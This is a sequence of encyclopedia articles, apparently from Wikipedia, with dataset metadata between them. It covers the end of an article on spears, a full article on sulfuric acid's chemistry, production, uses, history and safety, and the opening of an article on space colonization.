be taught to others, and could be made quickly and in large quantities. Native Americans used the buffalo pound method to kill buffalo, which required a hunter to dress as a buffalo and lure one into a ravine where other hunters were hiding. Once the buffalo appeared, the other hunters would kill him with spears. A variation of this technique, called the buffalo jump, was when a runner would lead the animals towards a cliff. As the buffalo got close to the cliff, other members of the tribe would jump out from behind rocks or trees and scare the buffalo over the cliff. Other hunters would be waiting at the bottom of the cliff to spear the animal to death. Hunting One of the earliest forms of killing prey for humans, hunting game with a spear and spear fishing continues to this day as both a means of catching food and as a cultural activity. Some of the most common prey for early humans were megafauna such as mammoths which were hunted with various kinds of spear. One theory for the Quaternary extinction event was that most of these animals were hunted to extinction by humans with spears. Even after the invention of other hunting weapons such as the bow and sling, the spear continued to be used, either as a projectile weapon or used by hand, such as in bear hunting and boar hunting. Types Barred spears: A barred spear has a crossbar beneath the blade, to prevent too deep a penetration of the spear into an animal. The bar may be forged as part of the spearhead or may be more loosely tied by means of loops below the blade. Barred spears are known from the Bronze Age, but the first historical record of their use in Europe is found in the writings of Xenophon in the 5th century BC. Examples also are shown in Roman art. In the Middle Ages, a winged or lugged war-spear was developed (see above), but the later Middle Ages saw the development of specialised types, such as the boar-spear and the bear-spear. The boar-spear could be used both on foot or horseback. Javelin Harpoon Trident Modern revival Spear hunting fell out of favor in most of Europe in the 18th century, but continued in Germany, enjoying a revival in the 1930s. Spear hunting is still practiced in the United States. Animals taken are primarily wild boar and deer, although trophy animals as large as Cape Buffalo have been hunted with spears. Alligators are hunted in Florida with a type of harpoon. Gymnastics One of the gymnastic exercises performed by the ancient Greeks was the throwing of a spear, referred to as ἀκυντισμός. In myth and legend Symbolism Like many weapons, a spear may also be a symbol of power. The Celts would symbolically destroy a dead warrior's spear either to prevent its use by another or as a sacrificial offering. In classical Greek mythology Zeus' bolts of lightning may be interpreted as a symbolic spear. Some would carry that interpretation to the spear that frequently is associated with Athena, interpreting her spear as a symbolic connection to some of Zeus' power beyond the Aegis once he rose to replacing other deities in the pantheon. Athena was depicted with a spear prior to that change in myths, however. Chiron's wedding-gift to Peleus when he married the nymph Thetis in classical Greek mythology, was an ashen spear as the nature of ashwood with its straight grain made it an ideal choice of wood for a spear. The Romans and their early enemies would force prisoners to walk underneath a 'yoke of spears', which humiliated them. The yoke would consist of three spears, two upright with a third tied between them at a height which made the prisoners stoop. It has been suggested that the arrangement has a magical origin, a way to trap evil spirits. The word subjugate has its origins in this practice (from Latin sub = under, jugum = yoke). In Norse mythology, the god Odin's spear (named Gungnir) was made by the sons of Ivaldi. It had the special property that it never missed its mark. During the War with the Vanir, Odin symbolically threw Gungnir into the Vanir host. This practice of symbolically casting a spear into the enemy ranks at the start of a fight was sometimes used in historic clashes, to seek Odin's support in the coming battle. In Wagner's opera Siegfried, the haft of Gungnir is said to be from the "World-Tree" Yggdrasil. Other spears of religious significance are the Holy Lance and the Lúin of Celtchar, believed by some to have vast mystical powers. Sir James George Frazer in The Golden Bough noted the phallic nature of the spear and suggested that in the Arthurian legends the spear or lance functioned as a symbol of male fertility, paired with the Grail (as a symbol of female fertility). The Hindu god of war Murugan is worshipped by Tamils in the form of the spear called Vel, which is his primary weapon. The term spear is also used (in a somewhat archaic manner) to describe the male line of a family, as opposed to the distaff or female line. Legends Amenonuhoko, spear of Izanagi and Izanami, creator gods in Japanese mythology Gáe Bulg, spear of Cúchulainn, hero in Irish mythology Gáe Buide and Gáe Derg, spears of Diarmuid Ua Duibhne which could inflict wounds that none can recover from Green Dragon Crescent Blade, a guan dao wielded by General Guan Yu in the Romance of the Three Kingdoms Gungnir, spear of Odin, a god in Norse mythology Holy Lance, said to be the spear that pierced the side of Jesus Pelian Spear, a spear that only Achilles could wield, inherited from his father Peleus, made by Chiron from an ash tree on Mount Pelion. Rhongomyniad referred to simply as Ron ("spear") in Geoffrey of Monmouth's History of Britain, the spear of King Arthur. Serpent Spear wielded by General Zhang Fei in the Romance of the Three Kingdoms Spear of Fuchai, the spear used by Goujian's arch-rival, King Fuchai of Wu, in China Spear of Lugh, named after Lugh, a god in Irish mythology Trident, a three-pronged fishing spear associated with a number of water deities, including the Etruscan Nethuns, Greek Poseidon, and Roman Neptune. Trishula, a three-pronged spear wielded by the Hindu deities Durga and Shiva Vel, a flattened broad tipped spear used by the Hindu deity Murugan
Technology
Melee weapons
null
29247
https://en.wikipedia.org/wiki/Sulfuric%20acid
Sulfuric acid
Sulfuric acid (American spelling and the preferred IUPAC name) or sulphuric acid (Commonwealth spelling), known in antiquity as oil of vitriol, is a mineral acid composed of the elements sulfur, oxygen, and hydrogen, with the molecular formula . It is a colorless, odorless, and viscous liquid that is miscible with water. Pure sulfuric acid does not occur naturally due to its strong affinity to water vapor; it is hygroscopic and readily absorbs water vapor from the air. Concentrated sulfuric acid is a strong oxidant with powerful dehydrating properties, making it highly corrosive towards other materials, from rocks to metals. Phosphorus pentoxide is a notable exception in that it is not dehydrated by sulfuric acid but, to the contrary, dehydrates sulfuric acid to sulfur trioxide. Upon addition of sulfuric acid to water, a considerable amount of heat is released; thus, the reverse procedure of adding water to the acid is generally avoided since the heat released may boil the solution, spraying droplets of hot acid during the process. Upon contact with body tissue, sulfuric acid can cause severe acidic chemical burns and secondary thermal burns due to dehydration. Dilute sulfuric acid is substantially less hazardous without the oxidative and dehydrating properties; though, it is handled with care for its acidity. Many methods for its production are known, including the contact process, the wet sulfuric acid process, and the lead chamber process. Sulfuric acid is also a key substance in the chemical industry. It is most commonly used in fertilizer manufacture but is also important in mineral processing, oil refining, wastewater treating, and chemical synthesis. It has a wide range of end applications, including in domestic acidic drain cleaners, as an electrolyte in lead-acid batteries, as a dehydrating compound, and in various cleaning agents. Sulfuric acid can be obtained by dissolving sulfur trioxide in water. Physical properties Grades of sulfuric acid Although nearly 100% sulfuric acid solutions can be made, the subsequent loss of at the boiling point brings the concentration to 98.3% acid. The 98.3% grade, which is more stable in storage, is the usual form of what is described as "concentrated sulfuric acid". Other concentrations are used for different purposes. Some common concentrations are: "Chamber acid" and "tower acid" were the two concentrations of sulfuric acid produced by the lead chamber process, chamber acid being the acid produced in the lead chamber itself (<70% to avoid contamination with nitrosylsulfuric acid) and tower acid being the acid recovered from the bottom of the Glover tower. They are now obsolete as commercial concentrations of sulfuric acid, although they may be prepared in the laboratory from concentrated sulfuric acid if needed. In particular, "10 M" sulfuric acid (the modern equivalent of chamber acid, used in many titrations), is prepared by slowly adding 98% sulfuric acid to an equal volume of water, with good stirring: the temperature of the mixture can rise to 80 °C (176 °F) or higher. Sulfuric acid Sulfuric acid contains not only molecules, but is actually an equilibrium of many other chemical species, as it is shown in the table below. Sulfuric acid is a colorless oily liquid, and has a vapor pressure of <0.001 mmHg at 25 °C and 1 mmHg at 145.8 °C, and 98% sulfuric acid has a vapor pressure of <1 mmHg at 40 °C. In the solid state, sulfuric acid is a molecular solid that forms monoclinic crystals with nearly trigonal lattice parameters. The structure consists of layers parallel to the (010) plane, in which each molecule is connected by hydrogen bonds to two others. Hydrates are known for n = 1, 2, 3, 4, 6.5, and 8, although most intermediate hydrates are stable against disproportionation. Polarity and conductivity Anhydrous is a very polar liquid, having a dielectric constant of around 100. It has a high electrical conductivity, a consequence of autoprotolysis, i.e. self-protonation: The equilibrium constant for autoprotolysis (25 °C) is: = 2.7 × 10−4 The corresponding equilibrium constant for water, Kw is 10−14, a factor of 1010 (10 billion) smaller. In spite of the viscosity of the acid, the effective conductivities of the and ions are high due to an intramolecular proton-switch mechanism (analogous to the Grotthuss mechanism in water), making sulfuric acid a good conductor of electricity. It is also an excellent solvent for many reactions. Chemical properties Acidity The hydration reaction of sulfuric acid is highly exothermic. As indicated by its acid dissociation constant, sulfuric acid is a strong acid: Ka1 = 1000 (pKa1 = −3) The product of this ionization is , the bisulfate anion. Bisulfate is a far weaker acid: Ka2 = 0.01 (pKa2 = 2) The product of this second dissociation is , the sulfate anion. Dehydration Concentrated sulfuric acid has a powerful dehydrating property, removing water () from other chemical compounds such as table sugar (sucrose) and other carbohydrates, to produce carbon, steam, and heat. Dehydration of table sugar (sucrose) is a common laboratory demonstration. The sugar darkens as carbon is formed, and a rigid column of black, porous carbon called a carbon snake may emerge. Similarly, mixing starch into concentrated sulfuric acid gives elemental carbon and water. The effect of this can also be seen when concentrated sulfuric acid is spilled on paper. Paper is composed of cellulose, a polysaccharide related to starch. The cellulose reacts to give a burnt appearance in which the carbon appears much like soot that results from fire. Although less dramatic, the action of the acid on cotton, even in diluted form, destroys the fabric. The reaction with copper(II) sulfate can also demonstrate the dehydration property of sulfuric acid. The blue crystals change into white powder as water is removed. Reactions with salts Sulfuric acid reacts with most bases to give the corresponding sulfate or bisulfate. Aluminium sulfate, also known as paper maker's alum, is made by treating bauxite with sulfuric acid: Sulfuric acid can also be used to displace weaker acids from their salts. Reaction with sodium acetate, for example, displaces acetic acid, , and forms sodium bisulfate: Similarly, treating potassium nitrate with sulfuric acid produces nitric acid. Sulfuric acid reacts with sodium chloride, and gives hydrogen chloride gas and sodium bisulfate: When combined with nitric acid, sulfuric acid acts both as an acid and a dehydrating agent, forming the nitronium ion , which is important in nitration reactions involving electrophilic aromatic substitution. This type of reaction, where protonation occurs on an oxygen atom, is important in many organic chemistry reactions, such as Fischer esterification and dehydration of alcohols. When allowed to react with superacids, sulfuric acid can act as a base and can be protonated, forming the ion. Salts of have been prepared (e.g. trihydroxyoxosulfonium hexafluoroantimonate(V) ) using the following reaction in liquid HF: The above reaction is thermodynamically favored due to the high bond enthalpy of the Si–F bond in the side product. Protonation using simply fluoroantimonic acid, however, has met with failure, as pure sulfuric acid undergoes self-ionization to give ions: which prevents the conversion of to by the HF/ system. Reactions with metals Even diluted sulfuric acid reacts with many metals via a single displacement reaction, like other typical acids, producing hydrogen gas and salts (the metal sulfate). It attacks reactive metals (metals at positions above copper in the reactivity series) such as iron, aluminium, zinc, manganese, magnesium, and nickel. Concentrated sulfuric acid can serve as an oxidizing agent, releasing sulfur dioxide: Lead and tungsten, however, are resistant to sulfuric acid. Reactions with carbon and sulfur Hot concentrated sulfuric acid oxidizes carbon (as bituminous coal) and sulfur: Electrophilic aromatic substitution Benzene and many derivatives undergo electrophilic aromatic substitution with sulfuric acid to give the corresponding sulfonic acids: Sulfur–iodine cycle Sulfuric acid can be used to produce hydrogen from water: {| |- | ||     || (120 °C, Bunsen reaction) |- | ||     || (830 °C) |- | ||     || (320 °C) |} The compounds of sulfur and iodine are recovered and reused, hence the process is called the sulfur–iodine cycle. This process is endothermic and must occur at high temperatures, so energy in the form of heat has to be supplied. The sulfur–iodine cycle has been proposed as a way to supply hydrogen for a hydrogen-based economy. It is an alternative to electrolysis, and does not require hydrocarbons like current methods of steam reforming. But note that all of the available energy in the hydrogen so produced is supplied by the heat used to make it. Occurrence Sulfuric acid is rarely encountered naturally on Earth in anhydrous form, due to its great affinity for water. Dilute sulfuric acid is a constituent of acid rain, which is formed by atmospheric oxidation of sulfur dioxide in the presence of water – i.e. oxidation of sulfurous acid. When sulfur-containing fuels such as coal or oil are burned, sulfur dioxide is the main byproduct (besides the chief products carbon oxides and water). Sulfuric acid is formed naturally by the oxidation of sulfide minerals, such as pyrite: The resulting highly acidic water is called acid mine drainage (AMD) or acid rock drainage (ARD). The can be further oxidized to : The produced can be precipitated as the hydroxide or hydrous iron oxide: The iron(III) ion ("ferric iron") can also oxidize pyrite: When iron(III) oxidation of pyrite occurs, the process can become rapid. pH values below zero have been measured in ARD produced by this process. ARD can also produce sulfuric acid at a slower rate, so that the acid neutralizing capacity (ANC) of the aquifer can neutralize the produced acid. In such cases, the total dissolved solids (TDS) concentration of the water can be increased from the dissolution of minerals from the acid-neutralization reaction with the minerals. Sulfuric acid is used as a defense by certain marine species, for example, the phaeophyte alga Desmarestia munda (order Desmarestiales) concentrates sulfuric acid in cell vacuoles. Stratospheric aerosol In the stratosphere, the atmosphere's second layer that is generally between 10–50 km above Earth's surface, sulfuric acid is formed by the oxidation of volcanic sulfur dioxide by the hydroxyl radical: Because sulfuric acid reaches supersaturation in the stratosphere, it can nucleate aerosol particles and provide a surface for aerosol growth via condensation and coagulation with other water-sulfuric acid aerosols. This results in the stratospheric aerosol layer. Extraterrestrial sulfuric acid The permanent Venusian clouds produce a concentrated acid rain, as the clouds in the atmosphere of Earth produce water rain. Jupiter's moon Europa is also thought to have an atmosphere containing sulfuric acid hydrates. Manufacturing Sulfuric acid is produced from sulfur, oxygen and water via the conventional contact process (DCDA) or the wet sulfuric acid process (WSA). Contact process In the first step, sulfur is burned to produce sulfur dioxide. The sulfur dioxide is oxidized to sulfur trioxide by oxygen in the presence of a vanadium(V) oxide catalyst. This reaction is reversible and the formation of the sulfur trioxide is exothermic. The sulfur trioxide is absorbed into 97–98% to form oleum (), also known as fuming sulfuric acid or pyrosulphuric acid. The oleum is then diluted with water to form concentrated sulfuric acid. Directly dissolving in water, called the "wet sulfuric acid process", is rarely practiced because the reaction is extremely exothermic, resulting in a hot aerosol of sulfuric acid that requires condensation and separation. Wet sulfuric acid process In the first step, sulfur is burned to produce sulfur dioxide: (−297 kJ/mol) or, alternatively, hydrogen sulfide () gas is incinerated to gas: (−1036 kJ/mol) The sulfur dioxide then oxidized to sulfur trioxide using oxygen with vanadium(V) oxide as catalyst. (−198 kJ/mol) (reaction is reversible) The sulfur trioxide is hydrated into sulfuric acid : (−101 kJ/mol) The last step is the condensation of the sulfuric acid to liquid 97–98% : (−69 kJ/mol) Other methods Burning sulfur together with saltpeter (potassium nitrate, ), in the presence of steam, has been used historically. As saltpeter decomposes, it oxidizes the sulfur to , which combines with water to produce sulfuric acid. Prior to 1900, most sulfuric acid was manufactured by the lead chamber process. As late as 1940, up to 50% of sulfuric acid manufactured in the United States was produced by chamber process plants. A wide variety of laboratory syntheses are known, and typically begin from sulfur dioxide or an equivalent salt. In the metabisulfite method, hydrochloric acid reacts with metabisulfite to produce sulfur dioxide vapors. The gas is bubbled through nitric acid, which will release brown/red vapors of nitrogen dioxide as the reaction proceeds. The completion of the reaction is indicated by the ceasing of the fumes. This method conveniently does not produce an inseparable mist. Alternatively, dissolving sulfur dioxide in an aqueous solution of an oxidizing metal salt such as copper(II) or iron(III) chloride: Two less well-known laboratory methods of producing sulfuric acid, albeit in dilute form and requiring some extra effort in purification, rely on electrolysis. A solution of copper(II) sulfate can be electrolyzed with a copper cathode and platinum/graphite anode to give spongy copper at cathode and oxygen gas at the anode. The solution of dilute sulfuric acid indicates completion of the reaction when it turns from blue to clear (production of hydrogen at cathode is another sign): More costly, dangerous, and troublesome is the electrobromine method, which employs a mixture of sulfur, water, and hydrobromic acid as the electrolyte. The sulfur is pushed to bottom of container under the acid solution. Then the copper cathode and platinum/graphite anode are used with the cathode near the surface and the anode is positioned at the bottom of the electrolyte to apply the current. This may take longer and emits toxic bromine/sulfur-bromide vapors, but the reactant acid is recyclable. Overall, only the sulfur and water are converted to sulfuric acid and hydrogen (omitting losses of acid as vapors): (electrolysis of aqueous hydrogen bromide) (initial tribromide production, eventually reverses as depletes) (bromine reacts with sulfur to form disulfur dibromide) (oxidation and hydration of disulfur dibromide) Uses World production in the year 2004 was about 180 million tonnes, with the following geographic distribution: Asia 35%, North America (including Mexico) 24%, Africa 11%, Western Europe 10%, Eastern Europe and Russia 10%, Australia and Oceania 7%, South America 7%. Most of this amount (≈60%) is consumed for fertilizers, particularly superphosphates, ammonium phosphate and ammonium sulfates. About 20% is used in chemical industry for production of detergents, synthetic resins, dyestuffs, pharmaceuticals, petroleum catalysts, insecticides and antifreeze, as well as in various processes such as oil well acidicizing, aluminium reduction, paper sizing, and water treatment. About 6% of uses are related to pigments and include paints, enamels, printing inks, coated fabrics and paper, while the rest is dispersed into a multitude of applications such as production of explosives, cellophane, acetate and viscose textiles, lubricants, non-ferrous metals, and batteries. Industrial production of chemicals The dominant use for sulfuric acid is in the "wet method" for the production of phosphoric acid, used for manufacture of phosphate fertilizers. In this method, phosphate rock is used, and more than 100 million tonnes are processed annually. This raw material is shown below as fluorapatite, though the exact composition may vary. This is treated with 93% sulfuric acid to produce calcium sulfate, hydrogen fluoride (HF) and phosphoric acid. The HF is removed as hydrofluoric acid. The overall process can be represented as: Ammonium sulfate, an important nitrogen fertilizer, is most commonly produced as a byproduct from coking plants supplying the iron and steel making plants. Reacting the ammonia produced in the thermal decomposition of coal with waste sulfuric acid allows the ammonia to be crystallized out as a salt (often brown because of iron contamination) and sold into the agro-chemicals industry. Sulfuric acid is also important in the manufacture of dyestuffs solutions. Industrial cleaning agent Sulfuric acid is used in steelmaking and other metallurgical industries as a pickling agent for removal of rust and fouling. Used acid is often recycled using a spent acid regeneration (SAR) plant. These plants combust spent acid with natural gas, refinery gas, fuel oil or other fuel sources. This combustion process produces gaseous sulfur dioxide () and sulfur trioxide () which are then used to manufacture "new" sulfuric acid. Hydrogen peroxide () can be added to sulfuric acid to produce piranha solution, a powerful but very toxic cleaning solution with which substrate surfaces can be cleaned. Piranha solution is typically used in the microelectronics industry, and also in laboratory settings to clean glassware. Catalyst Sulfuric acid is used for a variety of other purposes in the chemical industry. For example, it is the usual acid catalyst for the conversion of cyclohexanone oxime to caprolactam, used for making nylon. It is used for making hydrochloric acid from salt via the Mannheim process. Much is used in petroleum refining, for example as a catalyst for the reaction of isobutane with isobutylene to give isooctane, a compound that raises the octane rating of gasoline (petrol). Sulfuric acid is also often used as a dehydrating or oxidizing agent in industrial reactions, such as the dehydration of various sugars to form solid carbon. Electrolyte Sulfuric acid acts as the electrolyte in lead–acid batteries (lead-acid accumulator): At anode: At cathode: Overall: Domestic uses Sulfuric acid at high concentrations is frequently the major ingredient in domestic acidic drain cleaners which are used to remove lipids, hair, tissue paper, etc. Similar to their alkaline versions, such drain openers can dissolve fats and proteins via hydrolysis. Moreover, as concentrated sulfuric acid has a strong dehydrating property, it can remove tissue paper via dehydrating process as well. Since the acid may react with water vigorously, such acidic drain openers should be added slowly into the pipe to be cleaned. History Vitriols The study of vitriols (hydrated sulfates of various metals forming glassy minerals from which sulfuric acid can be derived) began in ancient times. Sumerians had a list of types of vitriol that they classified according to the substances' color. Some of the earliest discussions on the origin and properties of vitriol is in the works of the Greek physician Dioscorides (first century AD) and the Roman naturalist Pliny the Elder (23–79 AD). Galen also discussed its medical use. Metallurgical uses for vitriolic substances were recorded in the Hellenistic alchemical works of Zosimos of Panopolis, in the treatise Phisica et Mystica, and the Leyden papyrus X. Medieval Islamic alchemists like the authors writing under the name of Jabir ibn Hayyan (died c. 806 – c. 816 AD, known in Latin as Geber), Abu Bakr al-Razi (865 – 925 AD, known in Latin as Rhazes), Ibn Sina (980 – 1037 AD, known in Latin as Avicenna), and Muhammad ibn Ibrahim al-Watwat (1234 – 1318 AD) included vitriol in their mineral classification lists. Jabir ibn Hayyan, Abu Bakr al-Razi, Ibn Sina, et al. The Jabirian authors and al-Razi experimented extensively with the distillation of various substances, including vitriols. In one recipe recorded in his ('Book of Secrets'), al-Razi may have created sulfuric acid without being aware of it: In an anonymous Latin work variously attributed to Aristotle (under the title , 'Book of Aristotle'), to al-Razi (under the title , 'Great Light of Lights'), or to Ibn Sina, the author speaks of an 'oil' () obtained through the distillation of iron(II) sulfate (green vitriol), which was likely 'oil of vitriol' or sulfuric acid. The work refers multiple times to Jabir ibn Hayyan's Seventy Books (), one of the few Arabic Jabir works that were translated into Latin. The author of the version attributed to al-Razi also refers to the as his own work, showing that he erroneously believed the to be a work by al-Razi. There are several indications that the anonymous work was an original composition in Latin, although according to one manuscript it was translated by a certain Raymond of Marseilles, meaning that it may also have been a translation from the Arabic. According to Ahmad Y. al-Hassan, three recipes for sulfuric acid occur in an anonymous Garshuni manuscript containing a compilation taken from several authors and dating from before . One of them runs as follows: The water of vitriol and sulphur which is used to irrigate the drugs: yellow vitriol three parts, yellow sulphur one part, grind them and distil them in the manner of rose-water. A recipe for the preparation of sulfuric acid is mentioned in , an Arabic treatise falsely attributed to the Shi'i Imam Ja'far al-Sadiq (died 765). Julius Ruska dated this treatise to the 13th century, but according to Ahmad Y. al-Hassan it likely dates from an earlier period: Then distil green vitriol in a cucurbit and alembic, using medium fire; take what you obtain from the distillate, and you will find it clear with a greenish tint. Vincent of Beauvais, Albertus Magnus, and pseudo-Geber Sulfuric acid was called 'oil of vitriol' by medieval European alchemists because it was prepared by roasting iron(II) sulfate or green vitriol in an iron retort. The first allusions to it in works that are European in origin appear in the thirteenth century AD, as for example in the works of Vincent of Beauvais, in the Compositum de Compositis ascribed to Albertus Magnus, and in pseudo-Geber's Summa perfectionis. Producing sulfuric acid from sulfur A method of producing oleum sulphuris per campanam, or "oil of sulfur by the bell", was known by the 16th century: it involved burning sulfur under a glass bell in moist weather (or, later, under a moistened bell). However, it was very inefficient (according to Gesner, of sulfur converted into less than of acid), and the resulting product was contaminated by sulfurous acid (or rather, solution of sulfur dioxide) so most alchemists (including, for example, Isaac Newton) didn't consider it equivalent with the "oil of vitriol". In the 17th century, Johann Rudolf Glauber discovered that adding saltpeter (potassium nitrate, ) significantly improves the output, also replacing moisture with steam. As saltpeter decomposes, it oxidizes the sulfur to , which combines with water to produce sulfuric acid. In 1736, Joshua Ward, a London pharmacist, used this method to begin the first large-scale production of sulfuric acid. Lead chamber process In 1746 in Birmingham, John Roebuck adapted this method to produce sulfuric acid in lead-lined chambers, which were stronger, less expensive, and could be made larger than the previously used glass containers. This process allowed the effective industrialization of sulfuric acid production. After several refinements, this method, called the lead chamber process or "chamber process", remained the standard for sulfuric acid production for almost two centuries. Distillation of pyrite Sulfuric acid created by John Roebuck's process approached a 65% concentration. Later refinements to the lead chamber process by French chemist Joseph Louis Gay-Lussac and British chemist John Glover improved concentration to 78%. However, the manufacture of some dyes and other chemical processes require a more concentrated product. Throughout the 18th century, this could only be made by dry distilling minerals in a technique similar to the original alchemical processes. Pyrite (iron disulfide, ) was heated in air to yield iron(II) sulfate, , which was oxidized by further heating in air to form iron(III) sulfate, , which, when heated to 480 °C, decomposed to iron(III) oxide and sulfur trioxide, which could be passed through water to yield sulfuric acid in any concentration. However, the expense of this process prevented the large-scale use of concentrated sulfuric acid. Contact process In 1831, British vinegar merchant Peregrine Phillips patented the contact process, which was a far more economical process for producing sulfur trioxide and concentrated sulfuric acid. Today, nearly all of the world's sulfuric acid is produced using this method. In the early to mid 19th century "vitriol" plants existed, among other places, in Prestonpans in Scotland, Shropshire and the Lagan Valley in County Antrim, Northern Ireland, where it was used as a bleach for linen. Early bleaching of linen was done using lactic acid from sour milk but this was a slow process and the use of vitriol sped up the bleaching process. Safety Laboratory hazards Sulfuric acid is capable of causing very severe burns, especially when it is at high concentrations. In common with other corrosive acids and alkali, it readily decomposes proteins and lipids through amide and ester hydrolysis upon contact with living tissues, such as skin and flesh. In addition, it exhibits a strong dehydrating property on carbohydrates, liberating extra heat and causing secondary thermal burns. Accordingly, it rapidly attacks the cornea and can induce permanent blindness if splashed onto eyes. If ingested, it damages internal organs irreversibly and may even be fatal. Personal protective equipment should hence always be used when handling it. Moreover, its strong oxidizing property makes it highly corrosive to many metals and may extend its destruction on other materials. Because of such reasons, damage posed by sulfuric acid is potentially more severe than that by other comparable strong acids, such as hydrochloric acid and nitric acid. Sulfuric acid must be stored carefully in containers made of nonreactive material (such as glass). Solutions equal to or stronger than 1.5 M are labeled "CORROSIVE", while solutions greater than 0.5 M but less than 1.5 M are labeled "IRRITANT". However, even the normal laboratory "dilute" grade (approximately 1 M, 10%) will char paper if left in contact for a sufficient time. The standard first aid treatment for acid spills on the skin is, as for other corrosive agents, irrigation with large quantities of water. Washing is continued for at least ten to fifteen minutes to cool the tissue surrounding the acid burn and to prevent secondary damage. Contaminated clothing is removed immediately and the underlying skin washed thoroughly. Dilution hazards Preparation of diluted acid can be dangerous due to the heat released in the dilution process. To avoid splattering, the concentrated acid is usually added to water and not the other way around. A saying used to remember this is "Do like you oughta, add the acid to the water". Water has a higher heat capacity than the acid, and so a vessel of cold water will absorb heat as acid is added. Also, because the acid is denser than water, it sinks to the bottom. Heat is generated at the interface between acid and water, which is at the bottom of the vessel. Acid will not boil, because of its higher boiling point. Warm water near the interface rises due to convection, which cools the interface, and prevents boiling of either acid or water. In contrast, addition of water to concentrated sulfuric acid results in a thin layer of water on top of the acid. Heat generated in this thin layer of water can boil, leading to the dispersal of a sulfuric acid aerosol, or worse, an explosion. Preparation of solutions greater than 6 M (35%) in concentration is dangerous, unless the acid is added slowly enough to allow the mixture sufficient time to cool. Otherwise, the heat produced may be sufficient to boil the mixture. Efficient mechanical stirring and external cooling (such as an ice bath) are essential. Reaction rates double for about every 10-degree Celsius increase in temperature. Therefore, the reaction will become more violent as dilution proceeds, unless the mixture is given time to cool. Adding acid to warm water will cause a violent reaction. On a laboratory scale, sulfuric acid can be diluted by pouring concentrated acid onto crushed ice made from de-ionized water. The ice melts in an endothermic process while dissolving the acid. The amount of heat needed to melt the ice in this process is greater than the amount of heat evolved by dissolving the acid so the solution remains cold. After all the ice has melted, further dilution can take place using water. Industrial hazards Sulfuric acid is non-flammable. The main occupational risks posed by this acid are skin contact leading to burns (see above) and the inhalation of aerosols. Exposure to aerosols at high concentrations leads to immediate and severe irritation of the eyes, respiratory tract and mucous membranes: this ceases rapidly after exposure, although there is a risk of subsequent pulmonary edema if tissue damage has been more severe. At lower concentrations, the most commonly reported symptom of chronic exposure to sulfuric acid aerosols is erosion of the teeth, found in virtually all studies: indications of possible chronic damage to the respiratory tract are inconclusive as of 1997. Repeated occupational exposure to sulfuric acid mists may increase the chance of lung cancer by up to 64 percent. In the United States, the permissible exposure limit (PEL) for sulfuric acid is fixed at 1 mg/m3: limits in other countries are similar. There have been reports of sulfuric acid ingestion leading to vitamin B12 deficiency with subacute combined degeneration. The spinal cord is most often affected in such cases, but the optic nerves may show demyelination, loss of axons and gliosis. Legal restrictions International commerce of sulfuric acid is controlled under the United Nations Convention Against Illicit Traffic in Narcotic Drugs and Psychotropic Substances, 1988, which lists sulfuric acid under Table II of the convention as a chemical frequently used in the illicit manufacture of narcotic drugs or psychotropic substances.
Physical sciences
Inorganic compounds
null
29248
https://en.wikipedia.org/wiki/Space%20colonization
Space colonization
Space colonization (or extraterrestrial colonization) is the colonization of outer space and astronomical bodies. As such it is a process of occupation or control for exploitation, such as extraterrestrial mining, and possibly extraterrestrial settlement. Making territorial claims in space is prohibited by international space law, defining space as a common heritage. International space law has had the goal to prevent colonial claims and militarization of space, and has advocated the installation of international regimes to regulate access to and sharing of space, particularly for specific locations such as the limited space of geostationary orbit or the Moon. To date, no permanent space settlement other than temporary space habitats have been established, nor has any extraterrestrial territory or land been internationally claimed. Currently there are also no plans for building a space colony by any government. However, many proposals, speculations, and designs, particularly for extraterrestrial settlements have been made through the years, and a considerable number of space colonization advocates and groups are active. Currently, the dominant private launch provider SpaceX, has been the most prominent organization planning space colonization on Mars, though having not reached a development stage beyond launch and landing systems. As a form of colonialism, space colonization is a multi-dimensional exploitation of people and environments. In this sense space colonization raises numerous socio-political questions. Many arguments for and against space settlement have been made. The two most common reasons in favor of colonization are the survival of humans and life independent of Earth, making humans a multiplanetary species, in the event of a planetary-scale disaster (natural or human-made), and the commercial use of space particularly for enabling a more sustainable expansion of human society through the availability of additional resources in space, reducing environmental damage on and exploitation of Earth, for the sake of de-colonizing Earth. The most common objections include concerns that the commodification of the cosmos may be likely to continue pre-existing detrimental processes such as environmental degradation, economic inequality and wars, enhancing the interests of the already powerful, particularly major economic and military institutions instead of halting the space colonization process and invest in solving existing major environmental and social issues. The mere construction of an extraterrestrial settlement, with the needed infrastructure, presents daunting technological, economic and social challenges. Space settlements are generally conceived as providing for nearly all (or all) the needs of larger numbers of humans. The environment in space is very hostile to human life and not readily accessible, particularly for maintenance and supply. It would involve much advancement of currently primitive technologies, such as controlled ecological life-support systems. With the high cost of orbital spaceflight (around $1400 per kg, or $640 per pound, to low Earth orbit by SpaceX Falcon Heavy), a space settlement would currently be massively expensive, but ongoing progress in reusable launch systems aim to change that (possibly reaching $20 per kg to orbit), and in creating automated manufacturing and construction techniques. Definition Space colonization has been in a broad sense referred to as space settlement, space humanization or space habitation. Space colonization in a narrow sense refers to space settlements, as envisioned by Gerard K. O'Neill. It is characterized by elements such as: settlement and exploitation, as well as territorial claim. The concept in its broad sense has been applied to any permanent human presence, even robotic, particularly along with the term "settlement", being imprecisely applied to any human space habitat, from research stations to self-sustaining communities in space. The words colony and colonization are terms rooted in colonial history on Earth, making them human geographic as well as particularly political terms. This broad use for any permanent human activity and development in space has been criticized, particularly as colonialist and undifferentiated (see below Objections). In this sense, a colony is a settlement that claims territory and exploits it for the settlers or their metropole. Therefore a human outpost, while possibly a space habitat or even a space settlement, does not automatically constitute a space colony. Though entrepôts like trade factories (trading posts) did often grow into colonies. Therefore any basing can be part of colonization, while colonization can be understood as a process that is open to more claims, beyond basing. The International Space Station, the longest-occupied extraterrestrial habitat thus far, does not claim territory and thus is not usually considered a colony. That said satellites have been identified by Moriba Jah as colonizing the orbits they take, by occupying the orbits in a form of ownership instead of stewardship. History When the first space flight programs commenced, they partly used – and have continued to use – colonial spaces on Earth, such as places of indigenous peoples at the RAAF Woomera Range Complex, Guiana Space Centre or contemporarily for astronomy at the Mauna Kea telescope. When orbital spaceflight was achieved in the 1950s colonialism was still a strong international project, e.g. easing the United States to advance its space program and space in general as part of a "New Frontier". At the same time of the beginning of the Space Age, decolonization gained again in force, producing many newly independent countries. These newly independent countries confronted spacefaring countries, demanding an anti-colonial stance and regulation of space activity when space law was raised and negotiated internationally. Fears of confrontations because of land grabs and an arms race in space between the few countries with spaceflight capabilities grew and were ultimately shared by the spacefaring countries themselves. This produced the wording of the agreed on international space law, starting with the Outer Space Treaty of 1967, calling space a "province of all mankind" and securing provisions for international regulation and sharing of outer space. The advent of geostationary satellites raised the case of limited 